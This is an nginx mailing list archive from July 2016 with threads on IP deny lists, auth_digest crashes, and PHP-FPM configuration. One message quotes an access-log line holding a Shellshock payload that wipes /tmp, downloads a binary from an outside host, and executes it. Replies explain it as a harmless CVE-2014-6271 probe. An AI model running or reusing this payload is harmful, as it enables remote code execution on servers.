From nginx-forum at forum.nginx.org Fri Jul 29 15:42:11 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Fri, 29 Jul 2016 11:42:11 -0400 Subject: Would nginx use multi block device instead of file system Message-ID: Using block devices directly, as ATS and Squid do, and building a request-offset hash table should be more efficient. Would nginx support this? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268627,268627#msg-268627 From nginx-forum at forum.nginx.org Fri Jul 29 18:55:11 2016 From: nginx-forum at forum.nginx.org (aamte) Date: Fri, 29 Jul 2016 14:55:11 -0400 Subject: Accessing library functions from our own nginx module Message-ID: <0786199394eb2b335d0abc47dbd81f91.NginxMailingListEnglish@forum.nginx.org> Hi, I am currently writing a dynamic nginx http module which is linked to a static C++ library using the following command: CORE_LIBS="$CORE_LIBS /path/to/static/library.a" I just started using nginx, and as a beginner I am stuck at the point where I am unable to call functions present in the library. Can someone please help me and guide me to an appropriate tutorial/code that I can look at and understand. I have been stuck for the past 2 days and any help would be really appreciated. Thanks in advance. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268628,268628#msg-268628 From lists at lazygranch.com Sat Jul 30 06:01:05 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Fri, 29 Jul 2016 23:01:05 -0700 Subject: Hierarchy of malformed requests and blocked IPs Message-ID: <20160730060105.5501012.85163.7747@lazygranch.com> An HTML attachment was scrubbed... URL: From vbart at nginx.com Sat Jul 30 10:18:47 2016 From: vbart at nginx.com (Valentin V.
Bartenev) Date: Sat, 30 Jul 2016 13:18:47 +0300 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <20160730060105.5501012.85163.7747@lazygranch.com> References: <20160730060105.5501012.85163.7747@lazygranch.com> Message-ID: <3493118.aR1ooWoyal@vbart-laptop> On Friday 29 July 2016 23:01:05 lists at lazygranch.com wrote: > I see a fair amount of hacking attempts in the access.log. That is, they show up with a return code of 400 (malformed). Well yeah, they are certainly malformed. But when I add the offending IP address to my blocked list, they still show up as malformed upon subsequent readings of access.log. That is, it appears to me that nginx isn't checking the blocked list first. > > If true, shouldn't the blocked IPs take precedence? > > Nginx 1.10.1 on freebsd 10.2 > It's unclear what you mean by "my blocked list". But if you're speaking about "ngx_http_access_module" then the answer is no, it shouldn't take precedence. It works on a location basis, which implies that the request has been parsed already. wbr, Valentin V. Bartenev From idefix at fechner.net Sat Jul 30 16:03:47 2016 From: idefix at fechner.net (Matthias Fechner) Date: Sat, 30 Jul 2016 18:03:47 +0200 Subject: Auth_digest not working Message-ID: <01c22c88-23f9-d38d-5ce2-0bdcb6c89f3d@fechner.net> Dear all, I have a very simple webserver running with php-fpm connected (to handle php scripts). It is running perfectly fine without authentication (on a FreeBSD installation).
If I enable auth_digest (which is enabled in the FreeBSD port I compiled), I see only this line in the main error log:

2016/07/30 17:55:54 [alert] 7280#102036: worker process 7318 exited on signal 11

The configuration is:

server {
    listen 127.0.0.1:8082 proxy_protocol;
    listen 127.0.0.1:8083 http2 proxy_protocol;
    add_header Strict-Transport-Security "max-age=15768000; includeSubdomains; preload" always;
    client_max_body_size 10G;
    client_body_buffer_size 128k;
    fastcgi_buffers 64 4K;
    server_name ;
    root /usr/home/http//html;
    access_log /usr/home/http/$host/logs/access.log;
    error_log /usr/home/http//logs/error.log debug;
    auth_digest_user_file /usr/home/http/default/htdigest.passwd;
    auth_digest 'partdb';

    location / {
        try_files $uri $uri/ @partdb;
    }
    location @partdb {
        rewrite ^/(.*) /index.php?id=$1&$args last;
    }
    location ~ \.php(?:$|/) {
        include fastcgi_params;
        fastcgi_pass php-handler;
    }
}

Does anyone have an idea why auth_digest leaves the virtual host completely non-working? Thanks Matthias -- "Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the universe trying to produce bigger and better idiots. So far, the universe is winning." -- Rich Cook From lists at lazygranch.com Sat Jul 30 17:52:46 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 30 Jul 2016 10:52:46 -0700 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <3493118.aR1ooWoyal@vbart-laptop> References: <20160730060105.5501012.85163.7747@lazygranch.com> <3493118.aR1ooWoyal@vbart-laptop> Message-ID: <20160730105246.12c5aad4@linux-h57q.site> On Sat, 30 Jul 2016 13:18:47 +0300 "Valentin V. Bartenev" wrote: > On Friday 29 July 2016 23:01:05 lists at lazygranch.com wrote: > > I see a fair amount of hacking attempts in the access.log. That is, > > they > show up with a return code of 400 (malformed). Well yeah, they are > certainly malformed.
But when I add the offending IP address to my > blocked list, they still show up as malformed upon subsequent > readings of access.log. That is, it appears to me that nginx isn't > checking the blocked list first. > > > > If true, shouldn't the blocked IPs take precedence? > > > > Nginx 1.10.1 on freebsd 10.2 > > > > It's unclear what do you mean by "my blocked list". But if you're > speaking about "ngx_http_access_module" then the answer is no, it > shouldn't take precedence. It works on a location basis, which > implies that the request has been parsed already. > > wbr, Valentin V. Bartenev > > _______________________________________________ My "blocked IPs" are implemented as follows. In nginx.conf:
------------------
http {
    include mime.types;
    include /usr/local/etc/nginx/blockips.conf;
-------------------------------------
The format of the blockips.conf file:
------------------
#haliburton
deny 34.183.197.69;
#cloudflare
deny 103.21.244.0/22;
deny 103.22.200.0/22;
deny 103.31.4.0/22;
-------------------------------
Running "make config" in the nginx ports, I don't see "ngx_http_access_module" as an option, nor anything similar. So given this setup, should the IP space in blockips.conf take precedence? My thinking is this. If a certain IP (or more generally the entire IP space of the entity) is known to be attempting hacks, why bother to process the HTTP request? I know I could block them in the firewall, but blocking in the web server makes more sense to me. Here is an example from access.log for a return code of 400: 95.213.177.126 - - [30/Jul/2016:11:35:46 +0000] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 173 "-" "-" I have the entire IP space of selectel.ru blocked since it is a source of constant hacking. (Uh, no offense to the land of dot ru.) From lists at lazygranch.com Sat Jul 30 17:57:44 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 30 Jul 2016 10:57:44 -0700 Subject: Bash script; Was it executed?
Message-ID: <20160730105744.3e03a76e@linux-h57q.site> I see a return code of 200. Does that mean this script was executed? ------------- 219.153.48.45 - - [30/Jul/2016:07:40:07 +0000] "GET / HTTP/1.1" 200 643 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma >> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod >> >> 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm >> >> -rf /tmp/*;echo wget http://houmen .linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 7 77 /tmp/Run.sh;/tmp/Run.sh\x22" ------------------------- From r1ch+nginx at teamliquid.net Sat Jul 30 19:06:48 2016 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Sat, 30 Jul 2016 21:06:48 +0200 Subject: Bash script; Was it executed? In-Reply-To: <20160730105744.3e03a76e@linux-h57q.site> References: <20160730105744.3e03a76e@linux-h57q.site> Message-ID: Not unless your / location passes the request to a vulnerable cgi-script using a vulnerable version of bash. See https://en.wikipedia.org/wiki/Shellshock_(software_bug) On Sat, Jul 30, 2016 at 7:57 PM, lists at lazygranch.com wrote: > I see a return code of 200. Does that mean this script was executed? 
> ------------- > 219.153.48.45 - - [30/Jul/2016:07:40:07 +0000] "GET / HTTP/1.1" 200 643 > "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget > http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma > >> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod > >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma > >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod > >> >> 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm > >> >> -rf /tmp/*;echo wget http://houmen > .linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma > >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod > >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma > >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 7 > 77 /tmp/Run.sh;/tmp/Run.sh\x22" > ------------------------- > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Sat Jul 30 19:09:27 2016 From: r at roze.lv (Reinis Rozitis) Date: Sat, 30 Jul 2016 22:09:27 +0300 Subject: Bash script; Was it executed? In-Reply-To: <20160730105744.3e03a76e@linux-h57q.site> References: <20160730105744.3e03a76e@linux-h57q.site> Message-ID: > I see a return code of 200. Does that mean this script was executed? The return code is for the GET request on /. Unless you have an index page that "executes" (typically via CGI) the referer or browser user agent, nothing was run. It seems to be a bash vulnerability attempt, known as Shellshock (CVE-2014-6271). rr From lists at lazygranch.com Sat Jul 30 19:32:44 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 30 Jul 2016 12:32:44 -0700 Subject: Bash script; Was it executed? In-Reply-To: References: <20160730105744.3e03a76e@linux-h57q.site> Message-ID: <20160730193244.5484625.75544.7777@lazygranch.com> Thanks. I am patched for shellshock.
The 200 return code threw me off. - Original Message - From: Reinis Rozitis Sent: Saturday, July 30, 2016 12:21 PM To: nginx at nginx.org Reply To: nginx at nginx.org Subject: Re: Bash script; Was it executed? > I see a return code of 200. Does that mean this script was executed? The return code is for GET request on /. Unless you have an index page that "executes" (typically cgi) referer or browser useragent. It seems as an bash vulnerabilty (known as shellshock CVE-2014-6271) attempt. rr _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Sat Jul 30 20:30:08 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Sat, 30 Jul 2016 16:30:08 -0400 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <20160730105246.12c5aad4@linux-h57q.site> References: <20160730105246.12c5aad4@linux-h57q.site> Message-ID: <2c367a9b83b92d60dfc579bec75dc6cb.NginxMailingListEnglish@forum.nginx.org> A 400 doesn't reach location blocks. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268629,268638#msg-268638 From mailinglisten at simonhoenscheid.de Sat Jul 30 20:44:55 2016 From: mailinglisten at simonhoenscheid.de (=?UTF-8?Q?Simon_H=c3=b6nscheid?=) Date: Sat, 30 Jul 2016 22:44:55 +0200 Subject: PHP-FPM Integration driving me mad Message-ID: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> Hello List, due to a server move, I was setting up a new nginx installation. Some of the pages need PHP. So far nothing new. When I add SCRIPT_FILENAME to the php location, the script is no longer found.
==> /var/log/nginx/www.example.com-error.log <== 2016/07/30 21:21:15 [error] 5546#5546: *1 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: xx.xxx.xxx.xxx, server: www.example.com, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://unix:/var/run/fpmpool-www.socket:", host: "www.example.com"

If I leave it out, the script is handled but no output is returned (blank white page). I've been debugging this for hours now and don't get any usable result. Any help is appreciated.

Nginx: 1.10.1 PHP: 5.6.24 OS: Debian 8.5

nginx conf:

user www-data;
worker_processes 4;
pid /var/run/nginx.pid;
worker_rlimit_nofile 40960;
events {
    use epoll;
    worker_connections 4096;
}
http {
    proxy_intercept_errors on;
    fastcgi_intercept_errors on;
    log_format main '';
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 5;
    sendfile on;
    keepalive_requests 150;
    include /etc/nginx/sites-enabled/*;
    include /etc/nginx/mime.types;
    open_file_cache max=40960 inactive=20s;
    open_file_cache_valid 30s;
    open_file_cache_min_uses 2;
    open_file_cache_errors on;
    gzip on;
    gzip_min_length 10240;
    gzip_proxied expired no-cache no-store private auth;
    gzip_types text/plain text/css text/xml application/xml text/javascript application/x-javascript;
    gzip_disable "MSIE [1-6]\.";
    proxy_buffers 64 32k;
}

the server itself:

server {
    server_name www.example.com;
    listen xxx.xxx.xxx.xx:443 ssl http2;
    access_log /var/log/nginx/www.example.com-access.log combined;
    error_log /var/log/nginx/www.example.com-error.log notice;
    ssl_protocols TLSv1.2 TLSv1.1 TLSv1;
    ssl_ciphers EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL;
    charset utf-8;
    index index.php index.html;
    client_max_body_size 50M;
    ssl_prefer_server_ciphers on;
    ssl_session_cache shared:SSL:5m;
    ssl_dhparam /etc/nginx/dhparam.pem;
    ssl_certificate /opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem;
    ssl_certificate_key
/opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem;

    location ~ /\. {
        deny all;
        access_log off;
        log_not_found off;
    }
    location / {
        try_files $uri $uri/ /index.php?q=$uri&$args;
        root /var/www/www.example.com;
    }
    location ~ \.php$ {
        fastcgi_buffers 16 4k;
        fastcgi_index index.php;
        fastcgi_pass unix:/var/run/fpmpool-www.socket;
        include fastcgi_params;
    }
}

PHP fpm config:

[global]
pid = /var/run/php5-fpm.pid
error_log = /var/log/php5-fpm.log
syslog.facility = daemon
syslog.ident = php-fpm
log_level = notice
emergency_restart_threshold = 0
emergency_restart_interval = 0
process_control_timeout = 0
include=/etc/php5/fpm/pool.d/*.conf

PHP pool config:

listen = /var/run/fpmpool-www.socket
listen.backlog = -1
listen.owner = www-data
listen.group = www-data
user = www-data
group = www-data
pm = dynamic
pm.max_children = 25
pm.start_servers = 10
pm.min_spare_servers = 10
pm.max_spare_servers = 20
pm.max_requests = 500
pm.status_path = /fpm-status
ping.response = pong
request_terminate_timeout = 60s
request_slowlog_timeout = 0
slowlog = /var/log/php-fpm/www-slow.log
rlimit_files = 32000
rlimit_core = unlimited
catch_workers_output = yes

The old PHP location, on the old server, was:

location ~* \.php$ {
    fastcgi_buffers 16 4k;
    fastcgi_index index.php;
    fastcgi_pass 127.0.0.1:9000;
    include fastcgi_params;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param SCRIPT_URI http://$http_host$request_uri;
    fastcgi_param SCRIPT_URL $request_uri;
    fastcgi_param SERVER_NAME $http_host;
}

Kind Regards Simon From vbart at nginx.com Sat Jul 30 20:49:30 2016 From: vbart at nginx.com (Valentin V.
Bartenev) Date: Sat, 30 Jul 2016 23:49:30 +0300 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <20160730105246.12c5aad4@linux-h57q.site> References: <20160730060105.5501012.85163.7747@lazygranch.com> <3493118.aR1ooWoyal@vbart-laptop> <20160730105246.12c5aad4@linux-h57q.site> Message-ID: <6477113.d8pPmRZ3H4@vbart-laptop> On Saturday 30 July 2016 10:52:46 lists at lazygranch.com wrote: > On Sat, 30 Jul 2016 13:18:47 +0300 > "Valentin V. Bartenev" wrote: > > > On Friday 29 July 2016 23:01:05 lists at lazygranch.com wrote: > > > I see a fair amount of hacking attempts in the access.log. That is, > > > they > > show up with a return code of 400 (malformed). Well yeah, they are > > certainly malformed. But when I add the offending IP address to my > > blocked list, they still show up as malformed upon subsequent > > readings of access.log. That is, it appears to me that nginx isn't > > checking the blocked list first. > > > > > > If true, shouldn't the blocked IPs take precedence? > > > > > > Nginx 1.10.1 on freebsd 10.2 > > > > > > > It's unclear what do you mean by "my blocked list". But if you're > > speaking about "ngx_http_access_module" then the answer is no, it > > shouldn't take precedence. It works on a location basis, which > > implies that the request has been parsed already. > > > > wbr, Valentin V. Bartenev > > > > _______________________________________________ > > My "blocked IPs" are implemented as follows. In nginx.conf: > ------------------ > http { > include mime.types; > include /usr/local/etc/nginx/blockips.conf; > ------------------------------------- > > Tne format of the blockips.conf file: > ------------------ > #haliburton > deny 34.183.197.69 ; > #cloudflare > deny 103.21.244.0/22 ; > deny 103.22.200.0/22 ; > deny 103.31.4.0/22 ; > ------------------------------- The "deny" directive comes from ngx_http_access_module. 
See the documentation: http://nginx.org/en/docs/http/ngx_http_access_module.html > > Running "make config" in the nginx ports, I don't see > "ngx_http_access_module" as an option, nor anything similar. > [..] It's a standard module, which is usually built by default. > So given this set up, should the IP space in blockedips.conf take precedence? No. > > My thinking is this. If a certain IP (or more generally the entire IP space of the entity) is known to be attempting hacks, why bother to process the http request? I know I could block them in the firewall, but blocking in the web server makes more sense to me. Why bother accepting such a connection at all? There's no sense in accepting a connection in nginx only to discard it immediately. In your case it should be blocked at the system level. wbr, Valentin V. Bartenev From h.aboulfeth at genious.net Sat Jul 30 21:08:42 2016 From: h.aboulfeth at genious.net (Hamza Aboulfeth) Date: Sat, 30 Jul 2016 22:08:42 +0100 Subject: PHP-FPM Integration driving me mad In-Reply-To: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> References: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> Message-ID: <8D46FE11-569E-4759-B0F9-55CB23B7EFA5@genious.net> Hello, I ran into the same issue myself yesterday; try disabling SELinux, which should fix your issue. Hamza > On 30 juil. 2016, at 21:44, Simon Hönscheid wrote: > > Hello List, > > due to a Server move, I was setting up a new nginx installation. Some of the pages need php. So far nothing new. When I start adding SCRIPT_FILENAME to the php location, it ends up that the script is no longer found.
> > > ==> /var/log/nginx/www.example.com-error.log <== > 2016/07/30 21:21:15 [error] 5546#5546: *1 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: xx.xxx.xxx.xxx, server: www.example.com, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://unix:/var/run/fpmpool-www.socket:", host: "www.example.com" > > Do I leave it out, the script is handled but no output is retuned.(blank white page) I'm debugging this now for hours and dont get any usable result. Any help is appreciated. > > Nginx: 1.10.1 > PHP: 5.6.24 > OS: Debian 8.5 > > nginx conf: > > user www-data; > worker_processes 4; > pid /var/run/nginx.pid; > worker_rlimit_nofile 40960; > events { > use epoll; > worker_connections 4096; > } > http { > proxy_intercept_errors on; > fastcgi_intercept_errors on; > log_format main ''; > tcp_nopush on; > tcp_nodelay on; > keepalive_timeout 5; > sendfile on; > keepalive_requests 150; > include /etc/nginx/sites-enabled/*; > include /etc/nginx/mime.types; > open_file_cache max=40960 inactive=20s; > open_file_cache_valid 30s; > open_file_cache_min_uses 2; > open_file_cache_errors on; > gzip on; > gzip_min_length 10240; > gzip_proxied expired no-cache no-store private auth; > gzip_types text/plain text/css text/xml application/xml text/javascript application/x-javascript; > gzip_disable "MSIE [1-6]\."; > proxy_buffers 64 32k; > } > > the server itself: > > server { > server_name www.example.com; > listen xxx.xxx.xxx.xx:443 ssl http2; > access_log /var/log/nginx/www.example.com-access.log combined; > error_log /var/log/nginx/www.example.com-error.log notice; > ssl_protocols TLSv1.2 TLSv1.1 TLSv1; > ssl_ciphers EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL; > charset utf-8; > index index.php index.html; > client_max_body_size 50M; > ssl_prefer_server_ciphers on; > ssl_session_cache shared:SSL:5m; > ssl_dhparam /etc/nginx/dhparam.pem; > ssl_certificate 
/opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem; > ssl_certificate_key /opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem; > > location ~ /\. { > deny all; > access_log off; > log_not_found off; > } > location / { > try_files $uri $uri/ /index.php?q=$uri&$args; > root /var/www/www.example.com; > } > location ~ \.php$ { > fastcgi_buffers 16 4k; > fastcgi_index index.php; > fastcgi_pass unix:/var/run/fpmpool-www.socket; > include fastcgi_params; > } > } > > > PHP fpm config > [global] > pid = /var/run/php5-fpm.pid > error_log = /var/log/php5-fpm.log > syslog.facility = daemon > syslog.ident = php-fpm > log_level = notice > emergency_restart_threshold = 0 > emergency_restart_interval = 0 > process_control_timeout = 0 > include=/etc/php5/fpm/pool.d/*.conf > > > PHP pool config: > > listen = /var/run/fpmpool-www.socket > listen.backlog = -1 > listen.owner = www-data > listen.group = www-data > user = www-data > group = www-data > pm = dynamic > pm.max_children = 25 > pm.start_servers = 10 > pm.min_spare_servers = 10 > pm.max_spare_servers = 20 > pm.max_requests = 500 > pm.status_path = /fpm-status > ping.response = pong > request_terminate_timeout = 60s > request_slowlog_timeout = 0 > slowlog = /var/log/php-fpm/www-slow.log > rlimit_files = 32000 > rlimit_core = unlimited > catch_workers_output = yes > > > old PHP Location, on old server was: > > location ~* \.php$ { > fastcgi_buffers 16 4k; > fastcgi_index index.php; > fastcgi_pass 127.0.0.1:9000; > include fastcgi_params; > fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; > fastcgi_param SCRIPT_URI http://$http_host$request_uri; > fastcgi_param SCRIPT_URL $request_uri; > fastcgi_param SERVER_NAME $http_host; > } > > Kind Regards > Simon > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From mailinglisten at simonhoenscheid.de Sat Jul 30 21:38:27 2016 From: mailinglisten at 
simonhoenscheid.de (=?UTF-8?Q?Simon_H=c3=b6nscheid?=) Date: Sat, 30 Jul 2016 23:38:27 +0200 Subject: PHP-FPM Integration driving me mad In-Reply-To: <8D46FE11-569E-4759-B0F9-55CB23B7EFA5@genious.net> References: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> <8D46FE11-569E-4759-B0F9-55CB23B7EFA5@genious.net> Message-ID: Hey, Debian has no SELinux. Kind Regards Simon On 30.07.16 at 23:08, Hamza Aboulfeth wrote: > Hello, > > Run into the same issue myself yesterday, try disabling selinux, should fix your issue. > > Hamza > >> On 30 juil. 2016, at 21:44, Simon Hönscheid wrote: >> >> Hello List, >> >> due to a Server move, I was setting up a new nginx installation. Some of the pages need php. So far nothing new. When I start adding SCRIPT_FILENAME to the php location, it ends up that the script is no longer found. >> >> >> ==> /var/log/nginx/www.example.com-error.log <== >> 2016/07/30 21:21:15 [error] 5546#5546: *1 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: xx.xxx.xxx.xxx, server: www.example.com, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://unix:/var/run/fpmpool-www.socket:", host: "www.example.com" >> >> Do I leave it out, the script is handled but no output is retuned.(blank white page) I'm debugging this now for hours and dont get any usable result. Any help is appreciated.
>> >> Nginx: 1.10.1 >> PHP: 5.6.24 >> OS: Debian 8.5 >> >> nginx conf: >> >> user www-data; >> worker_processes 4; >> pid /var/run/nginx.pid; >> worker_rlimit_nofile 40960; >> events { >> use epoll; >> worker_connections 4096; >> } >> http { >> proxy_intercept_errors on; >> fastcgi_intercept_errors on; >> log_format main ''; >> tcp_nopush on; >> tcp_nodelay on; >> keepalive_timeout 5; >> sendfile on; >> keepalive_requests 150; >> include /etc/nginx/sites-enabled/*; >> include /etc/nginx/mime.types; >> open_file_cache max=40960 inactive=20s; >> open_file_cache_valid 30s; >> open_file_cache_min_uses 2; >> open_file_cache_errors on; >> gzip on; >> gzip_min_length 10240; >> gzip_proxied expired no-cache no-store private auth; >> gzip_types text/plain text/css text/xml application/xml text/javascript application/x-javascript; >> gzip_disable "MSIE [1-6]\."; >> proxy_buffers 64 32k; >> } >> >> the server itself: >> >> server { >> server_name www.example.com; >> listen xxx.xxx.xxx.xx:443 ssl http2; >> access_log /var/log/nginx/www.example.com-access.log combined; >> error_log /var/log/nginx/www.example.com-error.log notice; >> ssl_protocols TLSv1.2 TLSv1.1 TLSv1; >> ssl_ciphers EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL; >> charset utf-8; >> index index.php index.html; >> client_max_body_size 50M; >> ssl_prefer_server_ciphers on; >> ssl_session_cache shared:SSL:5m; >> ssl_dhparam /etc/nginx/dhparam.pem; >> ssl_certificate /opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem; >> ssl_certificate_key /opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem; >> >> location ~ /\. 
{ >> deny all; >> access_log off; >> log_not_found off; >> } >> location / { >> try_files $uri $uri/ /index.php?q=$uri&$args; >> root /var/www/www.example.com; >> } >> location ~ \.php$ { >> fastcgi_buffers 16 4k; >> fastcgi_index index.php; >> fastcgi_pass unix:/var/run/fpmpool-www.socket; >> include fastcgi_params; >> } >> } >> >> >> PHP fpm config >> [global] >> pid = /var/run/php5-fpm.pid >> error_log = /var/log/php5-fpm.log >> syslog.facility = daemon >> syslog.ident = php-fpm >> log_level = notice >> emergency_restart_threshold = 0 >> emergency_restart_interval = 0 >> process_control_timeout = 0 >> include=/etc/php5/fpm/pool.d/*.conf >> >> >> PHP pool config: >> >> listen = /var/run/fpmpool-www.socket >> listen.backlog = -1 >> listen.owner = www-data >> listen.group = www-data >> user = www-data >> group = www-data >> pm = dynamic >> pm.max_children = 25 >> pm.start_servers = 10 >> pm.min_spare_servers = 10 >> pm.max_spare_servers = 20 >> pm.max_requests = 500 >> pm.status_path = /fpm-status >> ping.response = pong >> request_terminate_timeout = 60s >> request_slowlog_timeout = 0 >> slowlog = /var/log/php-fpm/www-slow.log >> rlimit_files = 32000 >> rlimit_core = unlimited >> catch_workers_output = yes >> >> >> old PHP Location, on old server was: >> >> location ~* \.php$ { >> fastcgi_buffers 16 4k; >> fastcgi_index index.php; >> fastcgi_pass 127.0.0.1:9000; >> include fastcgi_params; >> fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; >> fastcgi_param SCRIPT_URI http://$http_host$request_uri; >> fastcgi_param SCRIPT_URL $request_uri; >> fastcgi_param SERVER_NAME $http_host; >> } >> >> Kind Regards >> Simon >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From me at myconan.net Sat Jul 30 21:43:58 2016 
From: me at myconan.net (Edho Arief)
Date: Sun, 31 Jul 2016 06:43:58 +0900
Subject: PHP-FPM Integration driving me mad
In-Reply-To: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de>
References: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de>
Message-ID: <1469915038.659917.681402849.793AD758@webmail.messagingengine.com>

Hi,

On Sun, Jul 31, 2016, at 05:44, Simon Hönscheid wrote:
> server {
>     server_name www.example.com;
>     listen xxx.xxx.xxx.xx:443 ssl http2;
>     access_log /var/log/nginx/www.example.com-access.log combined;
>     error_log /var/log/nginx/www.example.com-error.log notice;
>     ssl_protocols TLSv1.2 TLSv1.1 TLSv1;
>     ssl_ciphers EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL;
>     charset utf-8;
>     index index.php index.html;
>     client_max_body_size 50M;
>     ssl_prefer_server_ciphers on;
>     ssl_session_cache shared:SSL:5m;
>     ssl_dhparam /etc/nginx/dhparam.pem;
>     ssl_certificate /opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem;
>     ssl_certificate_key /opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem;
>
>     location ~ /\. {
>         deny all;
>         access_log off;
>         log_not_found off;
>     }
>     location / {
>         try_files $uri $uri/ /index.php?q=$uri&$args;
>         root /var/www/www.example.com;
>     }
>     location ~ \.php$ {
>         fastcgi_buffers 16 4k;
>         fastcgi_index index.php;
>         fastcgi_pass unix:/var/run/fpmpool-www.socket;
>         include fastcgi_params;
>     }
> }

I think you're missing a `root` directive, either at the server level or in php's location block, and `SCRIPT_FILENAME` in php's location block.
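A minimal sketch of the two additions Edho is pointing at, using the root path and socket from Simon's own config (note: whether the included `fastcgi_params` file already sets `SCRIPT_FILENAME` varies by distribution, so it is passed explicitly here to be safe):

```nginx
server {
    # ... listen/ssl/log directives unchanged ...

    # Moved up from "location /": a server-level root applies to every
    # location, including the php one, so $document_root is defined there.
    root /var/www/www.example.com;

    location / {
        try_files $uri $uri/ /index.php?q=$uri&$args;
    }

    location ~ \.php$ {
        fastcgi_buffers 16 4k;
        fastcgi_index index.php;
        fastcgi_pass unix:/var/run/fpmpool-www.socket;
        include fastcgi_params;
        # Tell PHP-FPM which script to run; without this it has no path
        # to execute and nginx typically returns a blank page or 404/502.
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }
}
```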
From lists at lazygranch.com Sun Jul 31 01:15:04 2016
From: lists at lazygranch.com (lists at lazygranch.com)
Date: Sat, 30 Jul 2016 18:15:04 -0700
Subject: Hierarchy of malformed requests and blocked IPs
In-Reply-To: <6477113.d8pPmRZ3H4@vbart-laptop>
References: <20160730060105.5501012.85163.7747@lazygranch.com> <3493118.aR1ooWoyal@vbart-laptop> <20160730105246.12c5aad4@linux-h57q.site> <6477113.d8pPmRZ3H4@vbart-laptop>
Message-ID: <20160730181504.7ea3661a@linux-h57q.site>

